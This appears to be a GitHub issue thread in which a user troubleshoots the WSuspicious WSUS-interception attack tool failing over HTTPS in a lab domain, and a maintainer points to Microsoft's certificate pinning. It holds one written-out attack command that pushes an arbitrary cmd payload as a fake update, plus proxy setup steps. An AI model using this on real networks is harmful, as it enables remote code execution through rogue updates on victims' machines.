SSL interception does not work

[MexHigh]

My setup:

• Domain controller (Windows Server 2019): dc01.lsc.lab
• Domain client (updated Windows 10)

The Client has WSUS over HTTPS configured and uses it correctly (https://dc01.lsc.lab:8531). The certificate is accepted by Microsoft Edge when accesing the IIS default page and WSUS endpoint (using a Certificate with SAN issued by the domain CA).

I'm setting the systems proxy via admin powershell with netsh winhttp set proxy 127.0.0.1:13337.

I'm executing the following command: .\WSuspicious.exe /command:" -accepteula -s -d cmd /c echo 1 > C:\hacked.txt" /autoinstall /enabletls (The attack does work, if WSUS over HTTP is configured, so all prerequisites are met.)

This is, what I get after running the command:

The WSUS Server is using HTTPS. Adding a self-signed certificate to store
Prompting user to add the certificate. Please wait.
Detected WSUS Server - dc01.lsc.lab
Listening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337
Hit any key to exit..

Titanium.Web.Proxy.Exceptions.ProxyConnectException: Couldn't authenticate host 'dc01.lsc.lab' with certificate 'dc01.lsc.lab'. ---> System.IO.IOException: Fehler bei Authentifizierung, da die Gegenseite den Transportstream geschlossen hat.
   bei System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
   bei System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
   bei System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- Ende der Stapelüberwachung vom vorhergehenden Ort, an dem die Ausnahme ausgelöst wurde ---
   bei System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   bei System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
   --- Ende der internen Ausnahmestapelüberwachung ---
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()

The Windows Update GUI shows error code 0x800b0109 (displayed as "signature errors"):

When accessing any IIS page with the proxy activated and running, the certificate cannot be validated due to missing subject alternative name (SAN).

[MaxNad]

Microsoft implemented a certificate pinning mechanism to protect against this attack after the issue was disclosed to them.

If the WSUS certificate pinning feature is enabled, the tool is not expected to work. See https://techcommunity.microsoft.com/t5/windows-it-pro-blog/scan-changes-and-certificates-add-security-for-windows-devices/ba-p/2053668

Is this feature currently enabled in your setup ?

[MexHigh]

I thought this too, but i set the tick to not enforce it in the GPO and as i've read it in the docs, it is not enabled anyway, if there are no certificates in the corresponding certificate store.

So no, it is not enabled.